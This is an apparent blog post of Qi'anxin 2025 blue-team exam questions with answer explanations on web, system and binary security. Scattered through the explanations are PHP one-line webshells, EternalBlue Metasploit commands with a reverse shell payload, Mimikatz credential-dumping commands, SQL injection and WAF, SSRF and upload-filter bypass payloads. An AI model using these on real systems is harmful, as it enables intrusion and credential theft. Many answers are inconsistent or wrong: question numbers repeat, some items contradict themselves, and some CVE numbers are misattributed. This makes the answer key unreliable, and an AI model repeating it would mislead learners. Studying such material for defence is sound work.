当前位置: 首页 > article >正文

奇安信 2025 年护网蓝队初选笔试题(附答案解析)

🔥 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 🔥

熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题,(关注我我会持续更新)涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点,并附上详细答案解析,助力大家高效备考!

12.下列关于虚表指针描述正确的是(1.5分)

✅ B. 虚表指针存储的是虚表的首地址

❌ A. 任何类对象都存在虚表指针(仅含虚函数的类有)

❌ C. 虚表指针位于对象内存空间的起始处(由编译器决定)

❌ D. 虚表指针是否存在不影响对象所占内存空间的大小(存在时会增加指针大小)

📌 解析:

虚表指针(vptr)用于实现多态,指向类的虚函数表首地址。只有包含虚函数的类对象才会存在虚表指针,其位置由编译器决定(通常位于对象内存起始处,但不绝对),且会增加对象内存占用。

  1. MySQL基线检查中要求进行日志审核检查,以下关于日志审核加固方法正确的是?(1.5分)

✅ C. 在my.cnf 或my.ini 文件中,[mysqld]后添加 log-error= 并配置日志文件

❌ A. log-update=(已弃用,属于旧版更新日志)

❌ B. log-bin=(二进制日志,用于主从复制,非安全审计核心)

❌ D. #log=(通用查询日志,非基线强制要求)

📌 解析:

MySQL基线检查需确保错误日志(log-error)开启,记录数据库运行中的错误和警告,是安全事件追溯的关键。其他日志类型(如二进制日志、查询日志)根据需求选择性配置。

  1. RFI可以成功利用时,需要php.ini 中进行()配置(1.5分)

✅ A. allow_url_include = On

❌ B. allow_url_fopen = On(仅控制远程文件读取,非包含执行)

❌ C/D. allow_url_include = Off(禁用则无法触发RFI)

📌 解析:

远程文件包含(RFI)需同时满足:allow_url_fopen=On(允许读取远程文件)和 allow_url_include=On(允许包含远程文件作为代码执行)。

  1. 微擎CMS存在哪些漏洞(1.5分)

✅ B. 1.8.2后台getshell

✅ C. 低权限后台getshell

❌ A. 0.8后台任意文件删除(版本不匹配,实际漏洞需验证)

❌ D. 0.7 SQL注入漏洞(需具体CVE编号佐证)

📌 解析:

微擎CMS历史漏洞包括后台getshell(如1.8.2版本权限校验不严)、低权限用户通过接口上传恶意文件等。其他选项需结合具体漏洞公告验证。

  1. 关于SQL注入的防御方式有哪些?(1.5分)

✅ A. 部署WAF等安全设备

✅ B. 增加过滤(如特殊字符转义)

✅ C. 使用参数化语句(预编译)

❌ D. 动态拼接SQL(导致注入风险)

📌 解析:

防御SQL注入的核心是“输入不可信”,需通过预编译(参数化查询)、过滤/白名单校验、最小权限数据库账户、WAF拦截等多层防护。

  1. 下列属于SQL注入绕过WAF的方法是(1.5分)

✅ A. 注释符(如--、#)

✅ C. 内联注释(如/!UNION/)

✅ D. 替换关键字(如UNI/**/ON)

❌ B. 无法绕过(实际存在多种绕过手段)

📌 解析:

WAF绕过技术包括:注释混淆、字符编码(如十六进制)、多语句拆分、内联注释利用数据库特性、等价函数替换(如substring→mid)等。

  1. 以下用来显示文件内容的命令有哪些?(1.5分)

✅ A. cat

✅ B. less

✅ C. head

✅ D. more

📌 解析:

cat:直接输出全部内容

less/more:分页浏览

head:显示文件开头部分

其他类似命令:tail(显示末尾)、nl(带行号输出)。

  1. 下面哪个是对SSRF的防御?(1.5分)

✅ A. 限制端口(如仅允许80/443)

✅ C. 过滤返回信息(避免敏感数据泄露)

✅ D. 限制IP(禁止内网IP请求)

❌ B. 过滤POST参数(SSRF通常通过URL参数触发)

📌 解析:

SSRF(服务端请求伪造)防御需:禁用非常用协议(如file://、gopher://)、限制请求目标为白名单域名/IP、禁用重定向、校验响应内容类型等

14. 常见的WEB攻击方法有以下哪些?(1.5分)

✅ A. XSS

✅ B. SQL注入

✅ C. cookie欺骗

📌 解析

  • XSS(跨站脚本攻击):通过注入恶意脚本劫持用户会话或窃取信息。
  • SQL注入:通过构造恶意SQL语句操纵数据库,获取敏感数据或执行系统命令。
  • Cookie欺骗:伪造或篡改Cookie内容,绕过身份验证或提升权限。
    其他常见Web攻击:CSRF、SSRF、文件上传漏洞、命令注入等。

15. Goby支持哪几种代理扫描?(1.5分)

✅ A. HTTP

✅ C. HTTPS

✅ D. Socket

❌ B. Pcap(Goby不支持Pcap协议代理扫描)

❌ D. SSH登录暴力破解(属于爆破功能,非代理扫描)

📌 解析

Goby的代理扫描支持HTTP/HTTPS/Socket协议,用于绕过防火墙或匿名扫描。SSH暴力破解是独立功能,需通过插件或自定义脚本实现。


38. 在Java中可用于执行系统命令的方式有()(1.5分)

✅ A. java.lang.Runtime

✅ D. java.lang.ProcessBuilder

❌ B. java.lang.UNIXProcess/ProcessImpl (具体实现类,开发者不直接调用)

❌ C. java.lang.Process (抽象接口,需通过Runtime或ProcessBuilder实例化)

📌 解析

  • Runtime.exec() :直接执行命令,返回Process对象。
  • ProcessBuilder:更灵活的命令执行方式,支持重定向输入输出和环境变量配置。
    ⚠️ 注意:直接执行系统命令可能导致代码注入漏洞(如参数未过滤)。

39. 关于Weblogic SSRF漏洞(CVE-2014-4210)说法正确的是(1.5分)

✅ B. 实战中可通过爆破,根据返回包长度判断开放端口

✅ C. 通过错误信息探测内网状态

✅ D. 访问/uddiexplorer/SearchPublicRegistries.jsp 可判断漏洞存在

❌ A. 影响版本应为:10.0.2.0、10.3.6.0、12.1.2.0(原选项版本描述不准确)

📌 解析

  • 漏洞利用:通过构造恶意URL参数(如operator=)触发SSRF,探测内网服务。
  • 检测方法:返回包长度差异或错误信息(如404/503)可推断端口开放状态。
  • 修复建议:升级至安全版本,禁用uddiexplorer组件。

40. 下列常用端口,可能用于反射放大DDoS攻击的有(1.5分)

✅ A. NTP 123/udp(NTP反射攻击)

✅ C. memcache 11211/udp(Memcached放大攻击)

❌ B. DNS 53/tcp(DNS反射通常用UDP协议)

❌ D. HTTPS 443/tcp(TCP协议无法有效放大流量)

📌 解析

反射放大攻击依赖UDP协议和无认证响应机制:

  • NTPmonlist命令可放大200倍流量。
  • Memcached:单请求可触发数万倍响应数据。
    其他高危协议:SSDP(1900/udp)、CharGen(19/udp)。

35. 以下说法正确的是()(1.5分)

✅ B. C:\Windows\win.ini 是保存系统配置的重要文件

✅ C. hosts文件优先级高于DNS解析

❌ A. C:\Windows\System32存放系统核心文件(用户配置文件在C:\Users

❌ D. C:\ProgramData存放程序共享数据(病毒常锁定用户目录如AppData

📌 解析

  • hosts文件:路径为C:\Windows\System32\drivers\etc\hosts,优先于DNS解析。
  • win.ini :早期Windows版本的系统配置文件,现代系统仍保留兼容性支持。

36. 以下哪种场景可能会感染病毒?(1.5分)

✅ A. 从陌生网站下载软件

✅ B. 下载陌生邮件附件

✅ C. 关闭系统更新功能(无法修复漏洞)

✅ D. 随意插入U盘(自动运行恶意脚本)

📌 解析

病毒传播途径:

  • 软件捆绑:破解软件、游戏外挂。
  • 钓鱼邮件:伪装为发票、订单的恶意附件(.exe、.js、.docm)。
  • U盘蠕虫:利用autorun.inf 自动执行。

35. 下列关于格式化字符串漏洞的说法正确的是()(1.5分)

✅ B. %n将已输出字节数写入指定地址

✅ C. %4$x直接访问第四个参数(简化利用)

✅ E. %hn/%hhn避免一次性写入过大数值

❌ A. 写0时需构造256溢出(实际写0需通过%n计算偏移)

📌 解析

  • 漏洞原理:攻击者控制格式化字符串(如printf(user_input)),通过%x泄露内存或%n篡改内存。
  • 利用技巧
    • %<N>c%<M>$n:向第M个参数指向的地址写入N字节。
    • %hhn写入1字节,%hn写入2字节,分阶段覆盖内存(如修改GOT表)

32. SQL注入包含下列哪些类型?(1.5分)

✅ A. 延时注入

✅ C. 报错注入

✅ E. 二次注入

❌ B. XXE注入(属于XML实体注入,与SQL无关)

📌 解析

  • 延时注入:通过sleep()等函数盲注,根据响应时间推断数据。
  • 报错注入:利用数据库错误回显(如floor(rand()*2))泄露信息。
  • 二次注入:首次注入数据被存储,后续流程触发恶意代码。
    其他类型:联合查询注入、布尔盲注、堆叠查询(Stacked Query)。

31. 关于硬件断点的描述正确的是(1.5分)

✅ A. 不会修改程序的内存

✅ B. 可通过GetThreadContext检测

❌ C. 可以设置无数个(x86架构仅支持4个硬件断点)

❌ D. 不会修改调试寄存器(需占用调试寄存器DR0-DR3)

📌 解析

硬件断点通过CPU调试寄存器实现,不修改代码内存(与软件断点int3不同),适用于动态跟踪内存访问或执行流。调试工具(如x64dbg)可调用API检测寄存器状态。


26. 有关文件包含漏洞防御的说法正确的是()(1.5分)

✅ C. 从代码层和Web服务器配置两方面防范

✅ A. 限定可包含文件目录(如PHP open_basedir

✅ D. 代码层定义文件白名单(如include($_GET['file'].'.php')

❌ B. 定义目录白名单(需结合文件白名单更安全)

📌 解析

  • 代码层:禁用动态包含(如include($_GET['file'])),使用固定后缀或哈希校验。
  • 服务器层:配置目录权限限制,禁用高危函数(如allow_url_include=Off)。

23. .Net的BinaryFormatter反序列化漏洞利用条件为()(1.5分)

✅ C. Deserialize反序列化的内容用户可控

✅ D. .Net SDK ≤4.5(4.5+默认禁用BinaryFormatter

❌ A. Serialize内容可控(仅影响数据生成,非漏洞触发)

❌ B. SDK ≥4.5(漏洞在4.5以下版本未修复)

📌 解析

BinaryFormatter因未验证反序列化数据导致RCE(如ysoserial生成Payload)。微软建议使用DataContractSerializer替代,并设置SerializationBinder限制类型。


24. OllyDBG中可采用什么方法断在指定DLL加载处?(1.5分)

✅ A. 设置中断在新模块加载事件

✅ D. 对LoadLibrary等函数下断点

❌ B/C. 输出表/导入表断点(适用于函数调用,非模块加载)

📌 解析

  • 模块加载事件:通过Options → Debugging options → Events → Break on new module实现。
  • API断点:对LoadLibraryWLdrLoadDll下断点,捕获动态加载的DLL路径。

22. SQL注入漏洞可能会出现在()位置(1.5分)

✅ A. HTTP请求报文的Host字段

✅ B. Cookie

✅ C. Referer

✅ D. GET参数

📌 解析

任何用户可控且拼接至SQL语句的参数均可能触发注入:

  • Host字段:部分框架将Host直接用于数据库查询。
  • Header字段:如X-Forwarded-For记录日志时未过滤。

19. Burp Suite支持做以下哪些操作?(1.5分)

✅ A. 枚举用户(Intruder模块爆破用户名)

✅ B. 编码解码(Decoder模块Base64/URL/HTML转换)

✅ C. 数据包重放(Repeater模块修改并重发请求)

✅ D. 抓包拦截(Proxy模块拦截HTTPS流量)

📌 解析

Burp Suite核心功能:

  • Scanner:自动化漏洞扫描(如SQLi/XSS)。
  • Collaborator:检测带外(OAST)漏洞。
  • Extender:插件扩展(如Log4j漏洞检测)。

25. 下列()不是SQLi辅助工具(1.5分)

✅ A. nslookup(DNS查询工具)

✅ B. dig(DNS解析工具)

✅ D. dnsenum(DNS子域名枚举工具)

❌ C. sqlmap(SQL注入自动化工具)

📌 解析

  • SQLi专用工具:sqlmap、Havij、Pangolin。
  • 网络工具:nslookup/dig用于域名解析,与注入无关。

34. Linux中,可以列目录的命令有哪些?(1.5分)

✅ A. /bin/[r-t](通配符匹配/bin/ls,需环境支持)

✅ B. echo ./*(列出当前目录下所有文件)

✅ C. find . -maxdepth 1(等效ls,但输出格式不同)

❌ D. /???/Is(路径正确但Is拼写错误,应为ls

📌 解析

  • /bin/[r-t]:通配符[r-t]匹配字母范围,若存在/bin/ls则执行。
  • echo ./*:输出当前目录所有文件名(依赖Shell扩展)。
  • find命令-maxdepth 1限制仅搜索当前目录。
  • 常见命令lsdir(部分Shell兼容)、tree -L 1(树状结构)。

37. 以下哪个选项为PHP一句话木马?(1.5分)

✅ D. <?php $_GET['eval']($_POST['test']); ?>(动态调用函数,可执行任意代码)

❌ A. eval($ POST[test])(语法错误:$ POST应为$_POST

❌ B. echo "test"(无恶意行为)

❌ C. <script>alert(1)</script>(XSS脚本,非PHP木马)

📌 解析

  • D选项:通过$_GET['eval']获取函数名(如assert),执行$_POST['test']中的代码。
  • 典型一句话木马<?php @eval($_POST['cmd']); ?>,隐蔽性强且支持加密传输。

32. Linux的每类用户拥有三种权限分别是?(1.5分)

✅ A. r(读取)

✅ B. w(写入)

✅ C. x(执行)

❌ D. s(特殊权限,如SUID/SGID)

📌 解析

  • 基础权限
    • r:查看文件内容或列目录。
    • w:修改文件或删除目录内文件。
    • x:执行程序或进入目录。
  • 特殊权限
    • s:SUID(用户继承文件所有者权限)、SGID(目录继承组权限)。
    • t:粘滞位(限制目录文件删除权限)。

33. 以下哪些是文件上传绕过方法?(1.5分)

✅ A. %00截断(利用空字节终止字符串,如file.php%00.jpg

✅ B. 变换文件后缀名大小写(如.PhP绕过黑名单)

✅ C. 黑名单不全绕过(如未过滤.phtml.phar

✅ D. 利用Windows系统特性绕过(如file.php:.jpg 流文件)

📌 解析

  • 其他绕过手段
    • 双扩展名file.php.jpg (部分解析漏洞)。
    • Content-Type篡改:如图片MIME类型(image/jpeg)。
    • 文件头伪造:添加图片魔数(如GIF89a)。
    • .htaccess覆盖:自定义解析规则(Apache服务器)。

34. 修改java.io.ObjectInputStream 类的()方法检测类名合法性?(1.5分)

✅ A. resolveClass(反序列化时校验类名)

❌ B. resolveProxyClass(处理动态代理类,无关校验)

❌ C. writeObject(序列化方法)

❌ D. ReadObject(反序列化入口,需结合resolveClass

📌 解析

  • 防御反序列化漏洞
    • 重写resolveClass,限制可反序列化的类(如白名单校验)。
    • 使用SerializationFilter(Java 9+)或第三方库(如Apache Commons IO)。

33. 微警CMS存在哪些漏洞?(1.5分)

B. 低权限后台getshell

D. 1.8.2后台getshell

❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)

❌ C. 0.7 SQL注入漏洞(未广泛证实)

📌 解析

微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:

  • 低权限后台getshell:低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。
  • 1.8.2版本后台getshell:管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。
    其他选项需结合CVE编号验证,部分版本漏洞存在争议。

33. 以下关于CC攻击说法正确的是?(1.5分)

C. CC攻击需要借助代理进行

D. CC攻击难以获取目标机器的控制权

❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)

❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)

📌 解析

  • CC攻击(Challenge Collapsar):模拟大量合法请求(如HTTP GET/POST),耗尽服务器资源(CPU、带宽、连接数)。
  • 特点
    • 需通过代理或僵尸网络隐藏攻击源IP。
    • 仅导致服务拒绝,无法直接控制目标机器。

29. 在MySQL中,数据类型大致分为?(1.5分)

A. 浮点型(FLOAT、DOUBLE、DECIMAL)

B. 字符串(CHAR、VARCHAR、TEXT)

C. 整型(INTEGER、INT、BIGINT)

D. 日期/时间(DATETIME、DATE、TIMESTAMP)

📌 解析

MySQL数据类型分类:

  • 数值型INTFLOATDECIMAL(精确小数)。
  • 字符型CHAR(定长)、VARCHAR(变长)、BLOB/TEXT(大文本)。
  • 日期型DATE(年月日)、TIME(时分秒)、TIMESTAMP(时间戳)。
  • 其他ENUM(枚举)、JSON(结构化数据)。

30. fscan如何指定密码来进行爆破?(1.5分)

C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt

❌ A. -pwd参数需指定具体密码(非文件路径)

❌ B. -userf仅指定用户名字典

❌ D. 缺少密码参数,语法错误

📌 解析

fscan常用参数:

  • -pwdf:指定密码字典文件路径(每行一个密码)。
  • -userf:指定用户名字典文件路径。
    示例:fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt

31. 修改Apache的默认网页目录需要配置哪些参数?(1.5分)

B. Directory(目录权限配置)

D. DocumentRoot(主目录路径)

❌ A. sshd_config(SSH服务配置文件)

❌ C. logs(日志目录,非核心配置)

📌 解析

Apache配置示例(httpd.conf 或站点配置文件):

apache复制DocumentRoot "/var/www/html"

<Directory "/var/www/html">

Options Indexes FollowSymLinks

AllowOverride All

Require all granted

</Directory>


27. 在Windows系统中,下列关于安全策略的功能特点哪些说法是正确的?(1.5分)

A. 本地安全策略设置分为账户策略、本地策略等5部分

B. 成员服务器的本地策略被域策略覆盖

C. 安全设置通过本地安全策略控制台管理

❌ D. 描述不完整(需结合组策略管理)

📌 解析

  • 本地安全策略:路径为secpol.msc ,管理密码复杂度、审计策略、用户权限分配等。
  • 组策略优先级:域策略 > 站点策略 > 组织单元策略 > 本地策略。

28. JOnAS默认用户名密码有?(1.5分)

A. jadmin/jonas

C. jonas/jonas

❌ B. admin/123456(常见弱口令,非默认)

❌ D. tomcat/tomcat(Tomcat默认凭证)

📌 解析

JOnAS(Java Open Application Server)默认凭证:

  • jadmin/jonas:管理员账户。
  • jonas/jonas:普通用户账户。
    建议安装后立即修改默认密码。

24. 下列常用端口,可能用于反射放大DDoS攻击的有?(1.5分)

B. memcache 11211/udp

C. NTP 123/udp

❌ A. DNS 53/tcp(UDP协议更常用于反射)

❌ D. HTTPS 443/tcp(TCP协议无法放大流量)

📌 解析

  • Memcached:无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。
  • NTPmonlist命令响应包放大效果显著。
    其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。

25. 在自动更新的对话框中的选择项包括下列哪些?(1.5分)

A. 自动(推荐)

B. 下载更新,由用户决定何时安装

C. 仅通知可用更新

D. 关闭自动更新

📌 解析

Windows更新选项(截至2025年):

  1. 自动安装更新:系统后台下载并安装。
  2. 下载但手动安装:用户选择时间重启。
  3. 仅通知:用户需主动下载。
  4. 禁用更新:需通过组策略或注册表实现。

26. IIS6.x解析漏洞利用方式有哪些?(1.5分)

A. 文件名(如test.asp;.jpg

D. 文件夹(如/upload/test.asp/1.jpg

❌ B. 默认类型名(IIS6无此机制)

❌ C. 默认扩展名(与漏洞无关)

📌 解析

  • 分号截断test.asp;.jpg 被解析为ASP文件。
  • 目录解析/asp目录/1.jpg 被当作ASP执行。
    修复建议:禁用非必要脚本映射,升级至IIS7+。

22. Websphere Java反序列化(CVE-2015-7450)漏洞影响版本有?(1.5分)

A. 8.5版

B. 8.5.5传统和自由

C. 8.0版

D. 7.0版

📌 解析

CVE-2015-7450:影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。

  • 漏洞机制:Apache Commons Collections库反序列化漏洞。
  • 修复方案:升级至Fix Pack 8.5.5.9+或应用官方补丁。

23. JBoss反序列化漏洞说法正确的是?(1.5分)

C. JBoss4.x访问/jbossmq-httpil/HTTPServerILServlet存在漏洞

D. JBoss5.x/6.x访问/invoker/readonly返回500可能存在漏洞

❌ A. JMX Invoker漏洞需关闭jmx-invoker-service.xml

❌ B. WLS Security漏洞属于WebLogic(非JBoss)

📌 解析

  • JBoss反序列化漏洞
    • 4.x版本/jbossmq-httpil/HTTPServerILServlet未授权访问,可执行任意代码。
    • 5.x/6.x版本/invoker/readonly接口反序列化漏洞(CVE-2017-12149)。
      修复建议:删除或限制访问高危接口,升级至EAP 7+。

20. 下面哪个是对SSRF的防御?(1.5分)

A. 限制IP(禁止内网IP请求)

B. 限制端口(仅允许80/443)

C. 过滤返回信息(避免敏感数据泄露)

❌ D. 过滤POST参数(SSRF通常通过URL触发)

📌 解析

SSRF防御策略

  • 协议白名单:仅允许HTTP/HTTPS。
  • 目标限制:禁止访问内网IP和非常用端口。
  • 响应过滤:屏蔽错误信息中的内网拓扑数据。

21. 关于漏洞修复以下说法正确的是?(1.5分)

A. 高稳定性环境需综合评估修复优先级

B. 修复可能影响业务连续性

❌ C. 极高危漏洞必须修复(不可忽略)

❌ D. Linux无需频繁升级(仍需定期更新)

📌 解析

漏洞修复原则:

  • 风险评估:结合CVSS评分、资产价值、利用可能性排序。
  • 测试验证:生产环境需在测试环境验证补丁兼容性。
  • 备份回滚:修复前备份系统,制定回滚方案。

17. 关于OpenSSL心脏出血漏洞修复说法正确的是?(1.5分)

C. 升级后需生成新密钥(原密钥可能泄露)

D. 升级至最新版本可解决

❌ A. 旧密钥可继续使用(存在被窃取风险)

❌ B. 用户需改密(漏洞泄露内存数据,非密码)

📌 解析

Heartbleed(CVE-2014-0160)修复步骤

  1. 升级OpenSSL至1.0.1g+或1.0.2+。
  2. 吊销旧证书并重新签发。
  3. 重启服务确保新版本生效。

18. IIS中间件文件上传漏洞利用方式有哪些?(1.5分)

A. 目录解析(a.asp/ 下任意文件解析为ASP)

D. 分号截断(test.asp;.jpg

❌ B. 路径后加.php(IIS6不支持PHP解析)

❌ C. 路径前加/php(无实际意义)

📌 解析

  • IIS6解析漏洞
    • 文件夹解析/asp_dir/1.jpg 被当作ASP执行。
    • 分号截断test.asp;.jpg 忽略分号后内容。
      修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求

19. 绕过SSRF过滤的进制转换方式

B. 十六进制(如0x7F000001 → 127.0.0.1)

D. 八进制(如0177.0.0.1 → 127.0.0.1)

❌ A. 十进制(需服务端支持转换,较少直接使用)

❌ C. 二进制(实际应用中难以直接拼接)

📌 解析

SSRF过滤通常拦截标准IP格式,通过以下方式绕过:

  • 十六进制:http://0x7F000001 → 127.0.0.1。
  • 八进制:http://0177.0.0.1 → 127.0.0.1。
  • 十进制:http://2130706433 → 127.0.0.1(部分场景有效)。

15. Web应用组件漏洞的正确说法

B. 组件可能出现多种漏洞

C. 漏洞可能导致数据泄露

❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)

❌ D. 组件无漏洞(所有软件均可能存漏洞)

📌 解析

  • 组件漏洞危害:如Apache Struts2漏洞(CVE-2017-5638)可导致RCE。
  • 防御建议:定期更新第三方库,使用SCA工具(如Dependency-Check)扫描依赖。

16. 木马躲避杀毒手法

A. 伪造数字签名

B. 动态获取函数地址(API混淆)

C. 内存/网络加载模块(无文件攻击)

D. 加壳混淆(如UPX、VMProtect)

📌 解析

  • 加壳工具:Themida、Armadillo隐藏代码特征。
  • 内存加载:使用Reflective DLL Injection规避文件扫描。

12. DNS信息查询工具

A. nslookup(基础DNS查询)

D. dig(详细DNS记录解析)

❌ B. sqlmap(SQL注入工具)

❌ C. volatility(内存取证工具)

📌 示例命令

bash复制dig example.com MX # 查询邮件服务器记录

nslookup -type=AAAA example.com # 查询IPv6地址


16. Windows钩子(Hook)错误说法

B. 钩子是网络通信程序(错误,钩子用于消息处理)

C. 钩子是应用程序(错误,钩子是函数级拦截机制)

❌ A/D正确(钩子处理消息,属于窗口函数机制)

📌 应用场景

  • 键盘钩子:记录按键输入(如恶意键盘记录器)。
  • 消息钩子:拦截窗口事件(如UI自动化测试)。

18. 蓝凌OA漏洞

A. EKP后台SQL注入

B. 前台SSRF到RCE

C. 任意文件上传

C. 前台SQL注入(选项重复,可能为笔误)

📌 修复建议

  • 限制文件上传类型,禁用危险协议(如file://)。
  • 对用户输入参数化查询,避免SQL注入。

14. 正确的网络基础说法

A. IPv6为128位(如2001:0db8:85a3::8a2e:0370:7334

B. 192.168.8.1属C类私有IP(范围192.168.0.0/16

C. C类默认掩码255.255.255.0

D. 127.0.0.1为本机地址

📌 扩展知识

  • 私有IP范围
    • A类:10.0.0.0/8
    • B类:172.16.0.0/12
    • C类:192.168.0.0/16

10. Metasploit模块

A. Auxiliary(信息收集、扫描)

B. Payload(攻击载荷,如反向Shell)

C. Exploits(漏洞利用代码)

❌ D. Listen(非独立模块,属于Payload配置)

📌 常用命令

bash复制use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.1

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


11. PHP危险函数

A. system()

C. exec()

D. shell_exec()

❌ B. phpinfo()(信息泄露,不直接执行命令)

📌 防御措施

  • 禁用高危函数(disable_functions=system,exec)。
  • 使用安全函数(如escapeshellarg()过滤参数)。

12. SQLMap支持的数据库

A. Oracle

C. MySQL

D. MSSQL

❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)

📌 示例命令

bash复制sqlmap -u "Example Domain --dbms=mysql

sqlmap -u "Example Domain --dbms=oracle


7. Mimikatz功能

A. 获取账号密码(从LSASS进程提取)

B. 哈希传递(Pass-the-Hash)

C. 票据传递(Pass-the-Ticket)

❌ D. 代理转发(需配合其他工具如Proxifier)

📌 经典命令

bash复制mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords


8. 命令执行函数

A. pcntl_exec()

C. popen()

D. passthru()

❌ B. phpinfo()(仅信息输出)

📌 风险示例

php复制<?php

passthru($_GET['cmd']); // 直接执行用户输入命令

?>


SQL查询问题:数学最高分姓名

B. select name where math is (select max(math)...)(语法错误,is用于NULL判断)

✅ 其他选项正确(A/C/D均等价,=in匹配唯一值)

📌 解析

  • 错误原因IS用于比较NULL,如math IS NULL
  • 正确语法WHERE math = (SELECT MAX(math) ...)

13. 社会工程学信息收集方法

B. 通过获取管理员信任获取密码(如钓鱼邮件、伪装身份)

D. 通过办公室电话、姓名、生日猜测密码(利用个人信息构造弱口令)

❌ A. 破解SAM库(技术手段,非社会工程学)

❌ C. 暴力破解工具(自动化攻击,非社会工程学)

补充

社会工程学的核心是利用人性弱点获取信息,例如:

  • 钓鱼攻击:伪造登录页面诱导用户输入密码。
  • 电话诈骗:冒充IT人员索要账户信息。
  • 垃圾翻查(Dumpster Diving):从废弃文件中提取敏感信息。

13. FineCMS漏洞

D. 前台getshell(如文件上传漏洞直接获取Webshell)

B. CSRF修改管理员密码(跨站请求伪造攻击)

❌ A. SSRF(需具体漏洞验证)

❌ C. 远程文件包含(未广泛披露)

背景

FineCMS历史漏洞案例:

  • 前台getshell:通过未过滤的上传功能植入恶意脚本(如/index.php?c=attachment&a=upload )。
  • CSRF修改密码:构造恶意链接诱使管理员点击,触发密码重置。

14. MSSQL删除无关账号的正确操作

B. 企业管理器→安全性→登录中删除账号(主登录入口)

C. 企业管理器→数据库→用户中删除账号(数据库级权限)

❌ A. 管理→删除账号(路径不准确)

❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)

操作示例

  1. 主登录账号:安全性→登录名→右键删除
  2. 数据库用户:数据库→用户→右键删除
    注意:需同步清理数据库用户与登录名的映射关系。

9. 致远(Seeyon)OA漏洞

A. A8 search_result.jsp SQL注入(CVE-2018-7314)

D. A8 htmlofficeservlet getshell(CVE-2017-10245)

❌ B. 任意用户密码修改(需结合其他漏洞)

❌ C. setextno.jsp SQL注入(未广泛证实)

漏洞利用

  • htmlofficeservlet getshell:上传构造的.jsp文件绕过过滤,路径如/seeyon/htmlofficeservlet
  • 修复建议:升级至最新版本,禁用危险接口。

10. 满足安全要求的操作

A. 密码策略复杂度要求(符合NIST标准)

D. 使用VPN连接(加密通信,防止中间人攻击)

❌ B. 密码永不过期(违反定期更换原则)

❌ C. 开启Telnet(明文传输,不安全)

扩展建议

  • 多因素认证:结合短信、令牌等增强安全性。
  • 日志审计:监控异常登录行为。

11. IIS容器常见漏洞

B. 短文件名漏洞(泄露文件路径,如test~1.asp

D. 解析漏洞(如test.asp;.jpg 被解析为ASP)

❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)

❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)

防御措施

  • 短文件名漏洞:禁用8.3文件名格式(fsutil behavior set disable8dot3 1)。
  • 解析漏洞:配置Handler Mappings限制可执行文件类型。

6. 网络排错命令作用

B. Netstat显示网络信息(连接、端口、路由表)

C. Ping测试连通性

D. Telnet测试端口开放(如telnet 192.168.1.1 80

❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)

常用命令示例

bash复制netstat -ano | findstr "ESTABLISHED" # 查看活动连接

tracert 8.8.8.8 # 追踪到Google DNS的路由


7. Linux操作系统安全描述

A. 保持系统补丁更新(如yum updateapt upgrade

C. 最小安装原则(减少攻击面)

D. 关闭无关服务(如systemctl disable telnet

❌ B. 全安装增加便利性(违反最小化安全原则)

安全实践

  • 禁用root远程登录:修改/etc/ssh/sshd_configPermitRootLogin no
  • 配置防火墙:使用iptablesfirewalld限制端口访问。
8. Tomcat JSP编译生成文件

C. index jsp.class

D. index jspjava

📝 解析

Tomcat的Jasper引擎将JSP编译为Java文件(如index_jsp.java )和Class文件(如index_jsp.class )。选项C和D命名格式错误(缺少下划线),故不会生成。


5. ThinkPHP 6.x漏洞

D. Thinkphp<6.0.2 session id未过滤导致getshell

📝 解析

  • CVE-2021-43767:Session ID未严格过滤,攻击者构造恶意Session ID触发反序列化漏洞。
  • 其他选项需结合具体CVE验证,但D为广泛确认的漏洞。

4. 事件ID描述

B. 4625登录失败

📝 解析

  • 4624:登录成功。
  • 4625:登录失败。
  • 4720:用户账户创建。
    选项B正确,D错误(4624应为成功)。

3. 数据库加密技术分类

A. 库加密

B. 列加密

📝 解析

  • 库加密:全库或表空间级加密(如Oracle TDE)。
  • 列加密:字段级加密(如敏感数据单独加密)。
    行加密(D)和表加密(C)属于子类,但题目要求主要分类。

1. 代码安全问题

C. SQL注入

📝 解析

sprintf直接拼接用户输入(argv[1])到SQL语句,未过滤单引号,导致注入。

示例攻击:' OR 1=1 -- 可绕过条件查询。


2. IIS短文件名生成条件

B. 后缀<4时,前缀长度≥9

D. 后缀≥4时,前缀长度1

📝 解析

  • 规则:文件名前缀超8字符或后缀超3字符时生成短名。
  • 示例longfilename.txtLONGFI~1.TXT

单选题答案

25. 查看本机IP命令

A. ipconfig

📝 补充ipconfig /all显示详细网络配置(IPv6地址、MAC地址等)。


26. 代理服务非优点

C. 防范数据驱动侵袭

📝 解析:代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。


27. Hydra指定用户名参数

C. -l

📝 示例hydra -l admin -P passlist.txt ssh://192.168.1.1


16. JBoss漏洞区别描述

B. 对

📝 CVE-2013-4810CVE-2015-7501反序列化点不同,前者使用JMXInvokerServlet,后者为web-console接口。


17. Python代码安全风险

D. XSS

📝 解析escape转义HTML但未处理NFKC规范化可能导致的字符合并(如%322),可能绕过过滤。


4. 非Web服务

D. Redis

📝 解析:Redis是内存数据库,Nginx、WebLogic、JBoss为Web服务组件。


40. x64函数参数寄存器

A. rdi

📝 调用约定

  • 第1参数:rdi
  • 第2参数:rsi
